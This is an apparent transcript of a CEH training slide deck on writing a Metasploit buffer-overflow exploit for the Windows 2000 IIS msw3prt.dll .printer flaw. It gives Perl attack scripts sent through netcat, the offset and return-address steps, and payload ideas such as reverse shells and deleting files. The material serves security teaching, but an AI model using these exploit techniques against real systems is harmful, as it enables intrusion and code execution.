ceh.v6. .module.23c.advanced.exploit.writing.using.metasploit.framework
TRANSCRIPT
Ethical HackingVersion 5
Exploit Writing Using Metasploit Framework
EC-Council
What is Metasploit Framework?
It is a open-source and freely available exploit development framework released under GPL licenseThe Metasploit Framework is written in the Perl scripting language and can run on Linux and Windows (using the Cygwin environment for Windows)The framework provides the following interfaces: • Msfcli• Msfweb• msfconsole
EC-Council
msfconsole
The msfconsole is an interactive command-line interface provides a command set that allows the user to manipulate the framework environment, set exploit options, and deploy the exploitCommands:• show exploits
– Lists the available exploits
• info– Shows the different aspects of the exploit like target platforms,
payloads etc.
• use– Uses the exploit
• help– Lists available commands
EC-Council
Screenshot
EC-Council
Show exploits
EC-Council
help
EC-Council
Web Interface
EC-Council
Running an exploit using the console
>use iis40_htr
>show targets
>show options
>set RHOST 10.0.0.5
>show advanced
>show payloads
>set PAYLOAD win32_bind
>exploit
EC-Council
Exploit Development with Metasploit
Writing an exploit requires an in-depth understanding of the target architecture’s assembly language, detailed knowledge of the operating system’s internal structures, and considerable programming skill
Metasploit greatly simplifies the exploit development
The first step in writing an exploit is to determine the specific attack vector against the target host
EC-Council
msw3prt.dll
Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests
Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code
Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart
EC-Council
Example
We will demonstrate how to develop an exploit for IIS msw3prt.dll vulnerability in Windows 2000 SP0
Our exploit will cause a buffer overflow in a component called msw3prt.dll, also known as the .printer ISAPI filter, which gives the operating system support for the Internet Printing Protocol
Our exploit will overwrite the instruction pointer with a location in memory that jumps to our program's exploit code
EC-Council
What you will need?
You will need the following to create the exploit• Metasploit framework
• ActivePerl
• Debugger for Windows
• OllyDbg Debugger
• netcat
EC-Council
Determining the Attack Vector
First• The attack vector of the vulnerability is determined
Second• The offset of the overflow vulnerability must be calculated
Third• Find the valid return address
Fourth• Determine the character and size limitations
Fifth• Create a nop sled
Sixth• Select the payload, generate and encode
Exploit!
EC-Council
First - The attack vector of the vulnerability is determined
Find the offset
$string = "GET /NULL.printerHTTP/1.0\nHost: ";
$string .= "A" x 500;
$string .= "\n\n";
open(NC, "|nc.exe 127.0.0.1 80");
print NC $string;
close(NC);
EC-Council
Debugger
1. Attach the debugger to the inetinfo.exe process. Ensure that the process continues execution after being interrupted.
2. Execute the script in the previous slide
3. The attack string should overwrite the return address.
4. The return address is popped into EIP.
5. When the processor attempts to access the invalid address storedin EIP, the system will throw an access violation.
6. The access violation is caught by the debugger, and the process halts.
7. When the process halts, the debugger will display process information including virtual memory, disassembly, the current stack, and the register states.
EC-Council
code
inetinfo attached to debugger
Perl code
EC-Council
Inetinfo process attached to debugger
EC-Council
Execute the perl code
EC-Council
EIP is overwritten with “AAAA”
AAAA in hexadecimal is 41414141
EC-Council
OllyDbg Screen
EC-Council
EIP
In the debugger window shown in the previous slide, EIP has been overwritten with the hexadecimal value 0x41414141
This corresponds to the ASCII string AAAA, which is a piece of Data that was sent to IIS
Because the processor attempts to access the invalid memory address, 0x41414141, the process halts in the debugger
EC-Council
Analysis of the code
In line 1, we start to build the attack string by specifying a GET request
In line 2, we append a string of 500 “A”characters
In line 3, we add carriage return and newline characters that terminate the request
In line 4, a pipe is created between the NC file handle and the Netcat utility. The Netcat utility has been instructed to connect to the target host at 127.0.0.1 on port 80
In line 5, the $string data is printed to the NC file handle. The NC file handle then passes the $string data through the pipe to Netcat which then forwards the request to the target host
In line 6, we close the connection
EC-Council
Determine the “offset” address
We need to calculate the location of the four A characters that overwrote the saved return addressA simple GET request consisting of A characters will not provideenough information to determine the location of the return addressA GET must be created such that any four consecutive bytes in the name are unique from any other four consecutive bytesWhen these unique four bytes are popped into EIP, you will be able to locate these four bytes in the GET stringTo determine the number of bytes that must be sent before the return address is overwritten, simply count the number of characters in the GET before the unique four-byte stringThe term offset is used to refer to the number of bytes that must be sent in the request just before the four bytes that overwrite the return address
EC-Council
PatternCreate()
You can use PatternCreate() method available from the Pex.pmlibrary located in ~/framework/lib to generate unique characters
The PatternCreate() method takes one argument specifying the length in bytes of the pattern to generate
The output is a series of ASCII characters of the specified length where any four consecutive characters are unique
These characters can be copied into the attack string
Command:perl -e “use Pex; print Pex::Text::PatternCreate(500)”
•or pipe it to a fileperl -e “use Pex; print Pex::Text::PatternCreate(500)” > string.txt
EC-Council
PatternCreate() Command
EC-Council
Generated string.txt
EC-Council
Send the newly generated string in the GET request
EC-Council
Debugger output
EIP = 6a413969
EC-Council
patternOffset.pl
EIP register contains the hexadecimal value 6a413969
Use patternOffset.pl script found in ~/framework/sdk to convert the hex into numberperl patternOffset.pl 6a413969 500
EC-Council
patternOffset.pl
EC-Council
EIP location
The patternOffset.pl script located the string “6a413969” at the offset 268
This means that 268 bytes of padding must be inserted into the attack string before the four bytes that overwrite the return address
The bytes in 1 to 268 contain the pattern string
The next four bytes in 269 to 272 overwrite the return address on the stack
268 bytes 4 bytes
Data (1-268 bytes) EIP (269-272)
EC-Council
268 bytes will not overwrite the buffer
Sending 268 bytes will not over the buffer
EIP will not be overwritten• $string = "GET /NULL.printerHTTP/1.0\nHost: ";
• $string .= "A" x 268;
• $string .= "\n\n";
• open(NC, "|nc.exe 127.0.0.1 80");
• print NC $string;
• close(NC);
EC-Council
EIP = NOT overwritten
EC-Council
272 bytes will overwrite the buffer
Sending 272 bytes will over the buffer
EIP will not be overwritten• $string = "GET /NULL.printerHTTP/1.0\nHost: ";
• $string .= "A" x 272;
• $string .= "\n\n";
• open(NC, "|nc.exe 127.0.0.1 80");
• print NC $string;
• close(NC);
EC-Council
EIP Overwritten
EIP = 41414141 overwritten
EC-Council
Controlling the Flow
Now we can overwrite the EIP with any return address we want ☺
This code will overwrite the EIP with 22222222• $string = "GET /NULL.printerHTTP/1.0\nHost: ";
• $string .= "A" x 268;
• $string .= “\x22\x22\x22\x22”;
• $string .= "\n\n";
• open(NC, "|nc.exe 127.0.0.1 80");
• print NC $string;
• close(NC);
EC-Council
EIP overwritten with 22222222
EC-Council
Control Vector
In a buffer overflow attack there are two ways to pass the control to the payload
First method:• overwrites the saved return address with the address
of the payload on the stack
Second method • overwrites the saved return address with an address
inside a shared library
• The instruction pointed to by the address in the shared library causes the process to bounce into the payload on the stack
EC-Council
First method:
The first technique overwrites the saved return address with an address of the payload located on the stackWhen the processor leaves the vulnerable function, the return address is popped into the EIP register, which now contains the address of the payloadEIP points to where the flow of execution is going nextBy changing the address of the payload into EIP, we can redirect the flow of execution to any payload
EC-Council
Where to place the payload?
The payload can be placed anywhere in the unused space currently occupied by the buffer overflow code.
Note that the payload can be placed before or after the return address (EIP)
The base address of the Windows stack is not as predictable as the base address of the stack found on UNIX systems
Windows systems is not possible to predict the location of the payload
EC-Council
Second method:
We can use Windows shared library to guide EIP to the payload regardless of its address in memory
We will need to examine the values of the registers to see if they point to locations within the attack string located on the stack
If we find a register that contains an address in our attack string, we can copy the value of this register into EIP, which now points to our attack string
EC-Council
EIP with the shared library technique
1. Assume register EAX points to our payload and overwrite the saved return address with the address of an instruction that copies the value in EAX into EIP
2. When the vulnerable function exits, the saved return address is popped into EIP
3. The processor executes the copying instruction, which moves the value of EAX into EIP
4. When the processor executes the next instruction, it will be code from the payload
EC-Council
Instructions that modify EIP
CALL, JMP • The CALL instruction is used to alter the path of
execution by changing the value of EIP with the argument passed to it
• The opcode that represents a CALL EAX is 0xFFD0
EC-Council
Finding the opcode in shared library
We can look up a valid return address from the Metasploit’s Opcode Database located at www.metasploit.com
The Metasploit Opcode Database contains over 8 million precalculated memory addresses for nearly 300 opcode types
EC-Council
EC-Council
EC-Council
EC-Council
EC-Council
OS Dependent Exploit
By using opcode from a list of shared libraries makes our exploit operating system version and service pack dependent
For example: You might say - the exploit hackme.exe only works on Windows Server 2000 SP3
EC-Council
Using the opcode
• $string = "GET /NULL.printerHTTP/1.0\nHost: ";
• $string .= "A" x 268;
• $string .= "\xf6\x15\xe8\x77";
• $string .= "\n\n";
• open(NC, "|nc.exe 127.0.0.1 80");
• print NC $string;
• close(NC);
opcode
EC-Council
Payload strings (shellcode)
What payload can I use for attack?
Well, anything how about reverse netcat, launch VNC, delete files, execute commands, create local user on the system etc.
You can use metasploit’s payload creator to generate the payload and attach them to exploit code instead of just sending “AAAAAAAAAA”
EC-Council
Metasploit payload generator
EC-Council
EC-Council
The payload
EC-Council
Metasploit Website
Metasploit provides tons of resources to develop Buffer Overflow exploits
Please visit www.metasploit.com for more information regarding exploit development
EC-Council
End of Slides